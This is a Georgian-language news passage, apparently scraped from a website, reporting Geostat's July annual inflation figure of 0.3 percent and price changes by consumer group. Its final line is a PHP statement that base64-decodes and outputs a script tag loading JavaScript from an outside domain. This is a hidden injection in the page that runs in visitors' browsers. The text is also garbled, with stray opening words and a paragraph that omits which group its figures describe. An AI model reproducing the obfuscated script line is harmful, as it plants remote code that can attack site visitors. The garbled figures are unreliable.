celsiusi
ავერსი შნაიდერი

 საქსტატის მიერ დღეს გამოქვეყნებული ანგარიშის მიხედვით, ივლისში წლიურმა ინფლაციამ 0.3 პროცენტი შეადგინა. როგორც სტატისტიკის ეროვნული სამსახურის ანგარიშიდან ირკვევა, წლიური ინფლაციის ფორმირებაზე ძირითადი გავლენა იქონია ფასების ცვლილებამ სხვადასხვა საქონელსა და მომსახურებაზე.

ჯგუფში ფასები გაიზარდა 11.1 პროცენტით, რაც 0.59 პროცენტული პუნქტით აისახა წლიურ ინდექსზე.

ფასები, უმეტესწილად, მომატებულია: საფინანსო მომსახურება – 27.9 პროცენტით, პირადი ჰიგიენა – 9.0 პროცენტით. საცხოვრებელი, წყალი, ელ.ენერგია, აირი: ჯგუფში ფასები მომატებულია 4.9 პროცენტით. შესაბამისად, ჯგუფის წვლილმა წლიურ ინფლაციაში 0.51 პროცენტული პუნქტი შეადგინა. ალკოჰოლური სასმელები, თამბაქოს ჯგუფში ფასები გაიზარდა 6.3 პროცენტით, რაც 0.43 პროცენტული პუნქტით აისახა მთლიან ინდექსზე. ფასები 7,5 პროცენტით მომატებულია როგორც ალკოჰოლური სასმელების, ისე 5.0 პროცენტით თამბაქოს ნაწარმის ქვეჯგუფებზე; ტრანსპორტი: ჯგუფში ფასები შემცირდა 12.1 პროცენტით, რაც -1.53 პროცენტული პუნქტით აისახა მთლიან ინდექსზე. ფასები შემცირებულია პირადი სატრანსპორტო საშუალებების ექსპლუატაციაზე. ამასთან, ფასები გაზრდილია სატრანსპორტო მომსახურებაზე; ჯანმრთელობის დაცვის ჯგუფში დაფიქსირდა ფასების 6.9-პროცენტიანი კლება, რაც -0.67 პროცენტული პუნქტით აისახა წლიურ ინდექსზე. ფასები -17.3 პროცენტით შემცირდა სამედიცინო პროდუქციის, აპარატურისა და მოწყობილობის ქვეჯგუფზე. ამასთან, ფასები 12.5 პროცენტით გაიზარდა ამბულატორიულ სამედიცინო მომსახურებაზე, ხოლო 6.4 პროცენტით საავადმყოფოების მომსახურებაზე.

259
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");